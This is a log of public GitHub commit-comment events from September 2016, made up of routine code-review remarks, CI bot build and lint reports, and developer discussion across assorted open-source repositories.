{"id":"4574706468","type":"CommitCommentEvent","actor":{"login":"tenderlove"},"repo":{"name":"ruby/ruby"},"payload":{"comment":{"id":19055900,"position":null,"line":null,"path":null,"commit_id":"cfb2b14ddce37c3a1c388748e6aaa897ce99923e","created_at":"2016-09-16T15:27:09Z","updated_at":"2016-09-16T15:27:09Z","body":"@tmm1 @nobu I'll partially revert this.  Some of the changes in this patch look good, but I think we should undo the output formatting changes."}},"created_at":"2016-09-16T15:27:09Z"}
{"id":"4574708260","type":"CommitCommentEvent","actor":{"login":"mboorstin"},"repo":{"name":"tulip/plotly.js"},"payload":{"comment":{"id":19055904,"position":9,"line":50,"path":"src/components/legend/attributes.js","commit_id":"66f8f3410e4b22f234a50ee7fb99d19335b47c19","created_at":"2016-09-16T15:27:27Z","updated_at":"2016-09-16T15:27:27Z","body":"description: 'Sets whether a horizontal legend is broken into columns or wrapped horizontally.'"}},"created_at":"2016-09-16T15:27:27Z"}
{"id":"4574709101","type":"CommitCommentEvent","actor":{"login":"Kabulla"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19055906,"position":null,"line":null,"path":null,"commit_id":"c247160a5fa6028d02adbc0dab506cd45564eede","created_at":"2016-09-16T15:27:35Z","updated_at":"2016-09-16T15:27:35Z","body":"Guys, I really appreciate your efforts on this!\r\nUnfortunately and due to business reasons I will not be able to test until late Sunday.\r\nWill let you know then..."}},"created_at":"2016-09-16T15:27:35Z"}
{"id":"4574713762","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19055910,"position":58,"line":58,"path":"docs/source/configuration.rst","commit_id":"71664744b1cafb99e1e7f0d85851d7e5a8d023bb","created_at":"2016-09-16T15:28:22Z","updated_at":"2016-09-16T15:28:22Z","body":"We're missing a crucial section on how to load these parameters once we've configured them."}},"created_at":"2016-09-16T15:28:22Z"}
{"id":"4574715295","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19055915,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T15:28:38Z","updated_at":"2016-09-16T15:28:38Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1191 of 1191 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-16T15:28:38Z"}
{"id":"4574719542","type":"CommitCommentEvent","actor":{"login":"sahirabranco"},"repo":{"name":"sahirabranco/Desfrutte"},"payload":{"comment":{"id":19055927,"position":null,"line":null,"path":null,"commit_id":"a99ce8fa3b98bda4c66ab1dcde0fa12ceddecf00","created_at":"2016-09-16T15:29:21Z","updated_at":"2016-09-16T15:29:21Z","body":"Quem somos\r\n"}},"created_at":"2016-09-16T15:29:21Z"}
{"id":"4574721516","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19055932,"position":12,"line":12,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:29:41Z","updated_at":"2016-09-16T15:29:41Z","body":"классы со span лучше задать родительской ссылке, так как на нее будет матчиться впоследствии js. Модификаторы open close лучше сменить на элемент main-menu__toggler (переключатель)"}},"created_at":"2016-09-16T15:29:41Z"}
{"id":"4574727794","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19055937,"position":16,"line":16,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:30:45Z","updated_at":"2016-09-16T15:30:45Z","body":"по хорошему для одного из пунктов меню нужно назначить модификатор для активной ссылки. __link--active"}},"created_at":"2016-09-16T15:30:45Z"}
{"id":"4574728217","type":"CommitCommentEvent","actor":{"login":"mboorstin"},"repo":{"name":"tulip/plotly.js"},"payload":{"comment":{"id":19055938,"position":6,"line":477,"path":"src/components/legend/draw.js","commit_id":"66f8f3410e4b22f234a50ee7fb99d19335b47c19","created_at":"2016-09-16T15:30:50Z","updated_at":"2016-09-16T15:30:50Z","body":"`isHorizontalColumn` does not seem to be defined in `src/components/legend/helpers.js`"}},"created_at":"2016-09-16T15:30:50Z"}
{"id":"4574729463","type":"CommitCommentEvent","actor":{"login":"Khaon"},"repo":{"name":"alexax66/kernel_samsung_a3xelte"},"payload":{"comment":{"id":19055941,"position":null,"line":null,"path":null,"commit_id":"2edd8e9e7f0958e959e104b0ebdf5468c905ce30","created_at":"2016-09-16T15:31:03Z","updated_at":"2016-09-16T15:31:03Z","body":"Hello,\r\n\r\naccording to the commit message, this i/o scheduler is good,\r\n\r\ndid you try so far ?"}},"created_at":"2016-09-16T15:31:03Z"}
{"id":"4574729920","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19055942,"position":null,"line":null,"path":null,"commit_id":"826da1aaff488ef11e846e2ee9f982c0a60686fa","created_at":"2016-09-16T15:31:09Z","updated_at":"2016-09-16T15:31:09Z","body":"это повлияет на ping?"}},"created_at":"2016-09-16T15:31:09Z"}
{"id":"4574733191","type":"CommitCommentEvent","actor":{"login":"jvasileff"},"repo":{"name":"tombentley/osric"},"payload":{"comment":{"id":19055952,"position":107,"line":107,"path":"source/com/github/tombentley/osric/server/CeylonTestBrowserTool.ceylon","commit_id":"ff0080c5c038d3c4d3a7cbb86c33974abe3cf3e5","created_at":"2016-09-16T15:31:41Z","updated_at":"2016-09-16T15:31:41Z","body":"Needs to be the optional `String?` for these, to avoid NPE."}},"created_at":"2016-09-16T15:31:41Z"}
{"id":"4574742528","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19055970,"position":32,"line":32,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:33:19Z","updated_at":"2016-09-16T15:33:19Z","body":"блок logo-sedona z бы перенес в header, по моему там он будет логичнее. Потом привяжем его к page-header через position: relative b отцентруем с помощью position: absolute"}},"created_at":"2016-09-16T15:33:19Z"}
{"id":"4574745055","type":"CommitCommentEvent","actor":{"login":"JoshSmith"},"repo":{"name":"code-corps/code-corps-phoenix"},"payload":{"comment":{"id":19055975,"position":null,"line":null,"path":null,"commit_id":"b395e949c7cf795afb87d5fbaf459f3fc419f139","created_at":"2016-09-16T15:33:45Z","updated_at":"2016-09-16T15:33:45Z","body":"How does this impact the work I'm doing in the analytics PR?"}},"created_at":"2016-09-16T15:33:45Z"}
{"id":"4574747092","type":"CommitCommentEvent","actor":{"login":"hoch"},"repo":{"name":"hoch/web-audio-api"},"payload":{"comment":{"id":19055982,"position":72,"line":4565,"path":"index.html","commit_id":"f824c20a9d1a659c1c42cacf6bd232c1c2ac93df","created_at":"2016-09-16T15:34:08Z","updated_at":"2016-09-16T15:34:08Z","body":"Sorry I was not clear. This node instance set will be referred by the processing model later, because the processing model needs to take care of AudioWorkletNode instances in the graph. Or we might be able to get away by saying \"this node will be treated like the other audio nodes.\"\r\n\r\nIf this ends up being redundant when we edit the processing model, I think we can remove then. Let me know what you think."}},"created_at":"2016-09-16T15:34:08Z"}
{"id":"4574754827","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19055994,"position":31,"line":31,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:35:28Z","updated_at":"2016-09-16T15:35:28Z","body":"если перенесем блок логотипа, то отпадает потребность в модификаторах. --small для мобильной? делаешь просто блок intro b картинки меняешь в зависимости от размера вьюпорта потом (адаптивность) без всяких модификаторов"}},"created_at":"2016-09-16T15:35:28Z"}
{"id":"4574755163","type":"CommitCommentEvent","actor":{"login":"Ianiusha"},"repo":{"name":"Ianiusha/Uselfuls_Scripts"},"payload":{"comment":{"id":19055995,"position":null,"line":null,"path":null,"commit_id":"df1e263ce2fd3f53343be6c6eada0b530ff3733a","created_at":"2016-09-16T15:35:31Z","updated_at":"2016-09-16T15:35:31Z","body":"FOR Win USERS: run a gamess job with no hassle"}},"created_at":"2016-09-16T15:35:31Z"}
{"id":"4574756908","type":"CommitCommentEvent","actor":{"login":"ernst67"},"repo":{"name":"jemproject/JEM-Project"},"payload":{"comment":{"id":19055998,"position":null,"line":null,"path":null,"commit_id":"e8813722207da34bdaa3cfd2925d4376f34c568d","created_at":"2016-09-16T15:35:50Z","updated_at":"2016-09-16T15:35:50Z","body":"Enhanced also means 'better', 'improved' and 'with more possibilities than standard'. In this context it's not the right term."}},"created_at":"2016-09-16T15:35:50Z"}
{"id":"4574757945","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19056002,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T15:36:01Z","updated_at":"2016-09-16T15:36:01Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1782 of 1782 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-16T15:36:01Z"}
{"id":"4574762743","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19056013,"position":null,"line":null,"path":null,"commit_id":"13627153888d3ac71645178a674491bc8151b8b6","created_at":"2016-09-16T15:36:53Z","updated_at":"2016-09-16T15:36:53Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13627153888d3ac71645178a674491bc8151b8b6-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-16T15:36:53Z"}
{"id":"4574763686","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"npct/pct-shiny"},"payload":{"comment":{"id":19056015,"position":null,"line":null,"path":null,"commit_id":"b249564090bf01b583dff05ca731a8545d6fcec3","created_at":"2016-09-16T15:37:03Z","updated_at":"2016-09-16T15:37:03Z","body":"True - but I kept it as it's needed for reproducibility: that script creates the geojson used in the front page map. Happy for it to migrate to pct, provided a link to that is explained somewhere, e.g. in a comment in the map JavaScript code."}},"created_at":"2016-09-16T15:37:03Z"}
{"id":"4574767363","type":"CommitCommentEvent","actor":{"login":"barcodebattler"},"repo":{"name":"welcon/artgame"},"payload":{"comment":{"id":19056024,"position":null,"line":null,"path":null,"commit_id":"2799c2c85eba051591f97cf5dbf02a8f5634e6e9","created_at":"2016-09-16T15:37:44Z","updated_at":"2016-09-16T15:37:44Z","body":"拡張完了"}},"created_at":"2016-09-16T15:37:44Z"}
{"id":"4574768923","type":"CommitCommentEvent","actor":{"login":"mboorstin"},"repo":{"name":"tulip/plotly.js"},"payload":{"comment":{"id":19056028,"position":5,"line":417,"path":"test/jasmine/tests/legend_test.js","commit_id":"66f8f3410e4b22f234a50ee7fb99d19335b47c19","created_at":"2016-09-16T15:38:02Z","updated_at":"2016-09-16T15:38:02Z","body":"This test just tests the configuration helper.  You should also test the behavior that you actually care about; ie, that the legend is built correctly."}},"created_at":"2016-09-16T15:38:02Z"}
{"id":"4574769410","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19056030,"position":7,"line":137,"path":"application/config/internal.php","commit_id":"fefb8fef6465dc807febd59f281a2f65d05e0e5d","created_at":"2016-09-16T15:38:08Z","updated_at":"2016-09-16T15:38:08Z","body":"Yes, manual log :) see mantis for the idea (it's just an idea)"}},"created_at":"2016-09-16T15:38:08Z"}
{"id":"4574774595","type":"CommitCommentEvent","actor":{"login":"smithualex"},"repo":{"name":"smithualex/sma"},"payload":{"comment":{"id":19056037,"position":null,"line":null,"path":null,"commit_id":"90ea4ce2a9c4edc5b1e0563fc4df9ed8f261dc66","created_at":"2016-09-16T15:39:02Z","updated_at":"2016-09-16T15:39:02Z","body":"jkkjmkmolm"}},"created_at":"2016-09-16T15:39:02Z"}
{"id":"4574775267","type":"CommitCommentEvent","actor":{"login":"bangkok615"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056040,"position":8,"line":8,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:39:10Z","updated_at":"2016-09-16T15:39:10Z","body":"ок,я мыслил исходя из рекоммендаци максимально сокращать для читабельности\r\n"}},"created_at":"2016-09-16T15:39:10Z"}
{"id":"4574775650","type":"CommitCommentEvent","actor":{"login":"mboorstin"},"repo":{"name":"tulip/plotly.js"},"payload":{"comment":{"id":19056042,"position":null,"line":null,"path":null,"commit_id":"66f8f3410e4b22f234a50ee7fb99d19335b47c19","created_at":"2016-09-16T15:39:14Z","updated_at":"2016-09-16T15:39:14Z","body":"This branch throws an error and fails to plot: `Uncaught TypeError: helpers.isHorizontalColumn is not a function(…)`, so I'm guessing that you didn't commit your changes in `helpers.js`."}},"created_at":"2016-09-16T15:39:14Z"}
{"id":"4574776184","type":"CommitCommentEvent","actor":{"login":"shrad17"},"repo":{"name":"shrad17/Social-Event-Management"},"payload":{"comment":{"id":19056043,"position":null,"line":null,"path":null,"commit_id":"a72b8df413482fbd56a0602ecfbf672bd2743204","created_at":"2016-09-16T15:39:19Z","updated_at":"2016-09-16T15:39:19Z","body":"All are Web Content"}},"created_at":"2016-09-16T15:39:19Z"}
{"id":"4574777142","type":"CommitCommentEvent","actor":{"login":"ErwinJanssen"},"repo":{"name":"ellson/graphviz"},"payload":{"comment":{"id":19056046,"position":null,"line":null,"path":null,"commit_id":"bd8475224854e99eb8876b33b5ce290f74441a99","created_at":"2016-09-16T15:39:30Z","updated_at":"2016-09-16T15:39:30Z","body":"What configuration / machine are you using where this caused a build breakage? This should be added Travis if possible."}},"created_at":"2016-09-16T15:39:30Z"}
{"id":"4574779008","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.namedfile"},"payload":{"comment":{"id":19056050,"position":null,"line":null,"path":null,"commit_id":"e75ea0d846c4b3cf70235c3fc8a5c0c94496d224","created_at":"2016-09-16T15:39:51Z","updated_at":"2016-09-16T15:39:51Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.namedfile/48/violations\n```\nplone/namedfile/copy.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/file.py:5:1: F401 'StringIO' imported but unused\nplone/namedfile/marshaler.py:8:1: C901 'If 8' is too complex (13)\nplone/namedfile/scaling.py:248:1: C901 'ImageScaling.create' is too complex (13)\nplone/namedfile/scaling.py:294:41: S001 found %r formatter\nplone/namedfile/utils/__init__.py:9:1: F401 'FileUpload' imported but unused\nplone/namedfile/utils/__init__.py:143:13: E265 block comment should start with '# '\nplone/namedfile/utils/__init__.py:161:29: F841 local variable 'e' is assigned to but never used\nplone/namedfile/utils/__init__.py:173:1: C901 'rotate_image' is too complex (17)\nplone/namedfile/utils/__init__.py:235:5: B901 blind except: statement\nplone/namedfile/utils/jpeg_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/png_utils.py:4:1: F401 'StringIO' imported but unused\nplone/namedfile/utils/tiff_utils.py:0:1: I001 isort found changes, run it on the file\nplone/namedfile/utils/tiff_utils.py:34:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:37:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:40:22: Q000 Remove bad quotes.\nplone/namedfile/utils/tiff_utils.py:72:1: C901 '_translate_field_type' is too complex (13)\nplone/namedfile/utils/tiff_utils.py:97:80: E501 line too long (89 > 79 characters)\nplone/namedfile/utils/tiff_utils.py:99:80: E501 line too long (88 > 79 characters)\nplone/namedfile/tests/base.py:54:16: P301 format call provides unused index (1)\nplone/namedfile/tests/test_scaling.py:91:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:92:70: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:109:14: D001 found failIf( replace it with assertFalse\nplone/namedfile/tests/test_scaling.py:158:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:159:70: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:166:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:167:72: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:174:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:175:72: S001 found % formatter\nplone/namedfile/tests/test_scaling.py:215:32: S001 found %s formatter\nplone/namedfile/tests/test_scaling.py:216:70: S001 found % formatter\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-16T15:39:51Z"}
{"id":"4574780448","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19056052,"position":null,"line":null,"path":null,"commit_id":"385adff680f6d7b077970959272a4d67a6408d26","created_at":"2016-09-16T15:40:07Z","updated_at":"2016-09-16T15:40:07Z","body":"https://framagit.org/SondagePro-LimeSurvey-plugin/sendMailCron/blob/master/README.md#logging ;)"}},"created_at":"2016-09-16T15:40:07Z"}
{"id":"4574781249","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19056054,"position":null,"line":null,"path":null,"commit_id":"3ac3c822d1918493e8031133e60e4aba1287ef89","created_at":"2016-09-16T15:40:16Z","updated_at":"2016-09-16T15:40:16Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#H2Vg5oDYTAupffYaLSCH2g"}},"created_at":"2016-09-16T15:40:16Z"}
{"id":"4574783246","type":"CommitCommentEvent","actor":{"login":"jamiew"},"repo":{"name":"jamiew/capitalismworksfor.me"},"payload":{"comment":{"id":19056060,"position":null,"line":null,"path":null,"commit_id":"7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2","created_at":"2016-09-16T15:40:35Z","updated_at":"2016-09-16T15:40:35Z","body":"OK cool, I'll figure out how to reset it now\n\nOn Fri, Sep 16, 2016 at 9:08 AM, Steve Lambert <notifications@github.com>\nwrote:\n\n> Using homebrew and trying to get it all up and running. Getting all the\n> dependent gems installed and configured in the gemfile and stuff has been\n> tricky. I can’t get foreman to start. The error messages start like this:\n>\n> 09:01:06 web.1 | started with pid 24292\n> 09:01:06 web.1 | I, [2016-09-16T09:01:06.451630 #24292] INFO -- :\n> Refreshing Gem list\n> 09:01:06 web.1 | /usr/local/lib/ruby/gems/2.3.0/gems/activesupport-4.0.0/\n> lib/active_support/values/time_zone.rb:282: warning: circular argument\n> reference - now\n> 09:01:07 web.1 | I, [2016-09-16T09:01:07.064508 #24292] INFO -- :\n> listening on addr=0.0.0.0:5000 fd=8\n> 09:01:07 web.1 | E, [2016-09-16T09:01:07.203541 #24292] ERROR -- : could\n> not connect to server: No such file or directory\n> 09:01:07 web.1 | Is the server running locally and accepting\n> 09:01:07 web.1 | connections on Unix domain socket \"/tmp/.s.PGSQL.5432\"?\n> 09:01:07 web.1 | (PG::ConnectionBad)\n>\n> I used homebrew to install postgre. Updated all my gems. Changed the\n> Gemfile so some of the versions matched for Ruby and kgio and stuff\n> (assuming that was the correct thing to do).\n>\n> Any ideas?\n>\n> The Moscow show opens in a couple hours, if we can get it reset, that\n> would be awesome. I can tweak the look later.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jamiew/capitalismworksfor.me/commit/7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2#commitcomment-19053821>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAHb47pFM4FYxpVr0lgExRsANeFWCTuks5qqpTFgaJpZM4J87TN>\n> .\n>\n"}},"created_at":"2016-09-16T15:40:35Z"}
{"id":"4574787954","type":"CommitCommentEvent","actor":{"login":"tombentley"},"repo":{"name":"tombentley/osric"},"payload":{"comment":{"id":19056072,"position":107,"line":107,"path":"source/com/github/tombentley/osric/server/CeylonTestBrowserTool.ceylon","commit_id":"ff0080c5c038d3c4d3a7cbb86c33974abe3cf3e5","created_at":"2016-09-16T15:41:27Z","updated_at":"2016-09-16T15:41:27Z","body":"Ah, thank you! I just copied and \"paste as ceylon\"-ed this from the `CeylonTestTool`, so colours is still something I have to fix."}},"created_at":"2016-09-16T15:41:27Z"}
{"id":"4574788126","type":"CommitCommentEvent","actor":{"login":"lararennie"},"repo":{"name":"googlei18n/libphonenumber"},"payload":{"comment":{"id":19056073,"position":21,"line":214,"path":"tools/java/java-build/src/com/google/i18n/phonenumbers/BuildMetadataJsonFromXml.java","commit_id":"49ec687dcfab3489bad29bbbd0238fbf2291943c","created_at":"2016-09-16T15:41:28Z","updated_at":"2016-09-16T15:41:28Z","body":"If empty - should be if false (or if default)"}},"created_at":"2016-09-16T15:41:28Z"}
{"id":"4574789692","type":"CommitCommentEvent","actor":{"login":"Lucrecious"},"repo":{"name":"SolarLune/bdx"},"payload":{"comment":{"id":19056076,"position":31,"line":31,"path":"extern/fontwriter/src/com/solarlune/fontwriter/DesktopLauncher.java","commit_id":"feec72706f463cc3da7262f013ef75fef448f537","created_at":"2016-09-16T15:41:46Z","updated_at":"2016-09-16T15:41:46Z","body":"> I'm not sure what you mean - \"this\" as in what? \r\n\r\n\"this\" as referring to the texture generation part, lines 21 - 79 (I didn't know how to comment on a section of code, only the line).\r\n\r\n\r\n> I added a feature to generate font textures always if an option is triggered in the GUI. That makes it easier to test out font changes without having to go back and delete the font files in the assets folder.\r\n\r\nSounds good. I just thought stuff like that would be better hidden away from the user - either always generate the textures or generate upon updated GUI settings. Personally, I don't care that much either way.\r\n\r\n\r\n> The font generation has to happen before BDX runs, and it can't be (and isn't) part of the actual BDX application, because that would require that we include the font generation code in the source, which would mean that the HTML5 target wouldn't build.\r\n\r\nI agree. The font generation, as I said [here](https://github.com/SolarLune/bdx/commit/feec72706f463cc3da7262f013ef75fef448f537#commitcomment-19053956), _seems_ like it should be done upon export though.\r\n\r\nAs a side note, I'm not quite sure how fonts would generate if I didn't run the desktop launcher. If I ran the android launcher, how would my fonts generate? Does it matter if the fonts don't generate if I run an android launcher?\r\n"}},"created_at":"2016-09-16T15:41:46Z"}
{"id":"4574793646","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056079,"position":45,"line":45,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:42:30Z","updated_at":"2016-09-16T15:42:30Z","body":"здесь бы я для формы вместо h2 использовал конструкцию fieldset + label, т.е. мы сразу же разделяем форму на блоки смысловые"}},"created_at":"2016-09-16T15:42:30Z"}
{"id":"4574795971","type":"CommitCommentEvent","actor":{"login":"wence-"},"repo":{"name":"firedrakeproject/firedrake"},"payload":{"comment":{"id":19056083,"position":7,"line":7,"path":"docs/source/parameters.rst","commit_id":"5e3a6c1883bf4ed25762cd8282cf42839ff45f8b","created_at":"2016-09-16T15:42:56Z","updated_at":"2016-09-16T15:42:56Z","body":"I would start this section as something like.\r\n\r\n```\r\nAutomated validation of simulation configurations\r\n====================================\r\n\r\nFiredrake provides an extensible mechanism for defining simulation parameters that supports\r\nvalidation of the provided inputs, as well as automatic creation of a browser-based configuration\r\nGUI (XXX link this to the config doc).  The core object that facilitates this is a :class:`~.Parameters` \r\ninstance.\r\n```"}},"created_at":"2016-09-16T15:42:56Z"}
{"id":"4574799015","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056089,"position":57,"line":57,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:43:31Z","updated_at":"2016-09-16T15:43:31Z","body":"зачем несколько форм? делай одну для всей страницы"}},"created_at":"2016-09-16T15:43:31Z"}
{"id":"4574800813","type":"CommitCommentEvent","actor":{"login":"pbmarcano"},"repo":{"name":"pbmarcano/bounded"},"payload":{"comment":{"id":19056091,"position":null,"line":null,"path":null,"commit_id":"18b33b8c8452e9131c4075d1d03451353d03ba6f","created_at":"2016-09-16T15:43:52Z","updated_at":"2016-09-16T15:43:52Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;YFdBCpOZ&#x2F;11-touch-up-layouts\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Touch up layouts</a>"}},"created_at":"2016-09-16T15:43:52Z"}
{"id":"4574801784","type":"CommitCommentEvent","actor":{"login":"stakeout"},"repo":{"name":"bangkok615/198622-sedona"},"payload":{"comment":{"id":19056094,"position":59,"line":59,"path":"form.html","commit_id":"e5873f04069c8ca17898fe36c0bda9fc9faea8d9","created_at":"2016-09-16T15:44:03Z","updated_at":"2016-09-16T15:44:03Z","body":"одна форма... убираем эту строку\r\n"}},"created_at":"2016-09-16T15:44:03Z"}
{"id":"4574802401","type":"CommitCommentEvent","actor":{"login":"jamiew"},"repo":{"name":"jamiew/capitalismworksfor.me"},"payload":{"comment":{"id":19056097,"position":null,"line":null,"path":null,"commit_id":"7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2","created_at":"2016-09-16T15:44:11Z","updated_at":"2016-09-16T15:44:11Z","body":"Turns out original author didn't do too bad a job with this little thing,\nshould be rest to 0 shortly. All the old votes are saved too in case you\nwant to bring them back\n\nIt could also be setup to show e.g. only votes from the last 90 days\n\nhttps://github.com/jamiew/capitalismworksfor.me/compare/7326de5...292ae9c\n\nOn Fri, Sep 16, 2016 at 11:40 AM, Jamie Wilkinson <jamie@jamiedubs.com>\nwrote:\n\n> OK cool, I'll figure out how to reset it now\n>\n> On Fri, Sep 16, 2016 at 9:08 AM, Steve Lambert <notifications@github.com>\n> wrote:\n>\n>> Using homebrew and trying to get it all up and running. Getting all the\n>> dependent gems installed and configured in the gemfile and stuff has been\n>> tricky. I can’t get foreman to start. The error messages start like this:\n>>\n>> 09:01:06 web.1 | started with pid 24292\n>> 09:01:06 web.1 | I, [2016-09-16T09:01:06.451630 #24292] INFO -- :\n>> Refreshing Gem list\n>> 09:01:06 web.1 | /usr/local/lib/ruby/gems/2.3.0\n>> /gems/activesupport-4.0.0/lib/active_support/values/time_zone.rb:282:\n>> warning: circular argument reference - now\n>> 09:01:07 web.1 | I, [2016-09-16T09:01:07.064508 #24292] INFO -- :\n>> listening on addr=0.0.0.0:5000 fd=8\n>> 09:01:07 web.1 | E, [2016-09-16T09:01:07.203541 #24292] ERROR -- : could\n>> not connect to server: No such file or directory\n>> 09:01:07 web.1 | Is the server running locally and accepting\n>> 09:01:07 web.1 | connections on Unix domain socket \"/tmp/.s.PGSQL.5432\"?\n>> 09:01:07 web.1 | (PG::ConnectionBad)\n>>\n>> I used homebrew to install postgre. Updated all my gems. Changed the\n>> Gemfile so some of the versions matched for Ruby and kgio and stuff\n>> (assuming that was the correct thing to do).\n>>\n>> Any ideas?\n>>\n>> The Moscow show opens in a couple hours, if we can get it reset, that\n>> would be awesome. I can tweak the look later.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/jamiew/capitalismworksfor.me/commit/7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2#commitcomment-19053821>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AAAHb47pFM4FYxpVr0lgExRsANeFWCTuks5qqpTFgaJpZM4J87TN>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-16T15:44:11Z"}
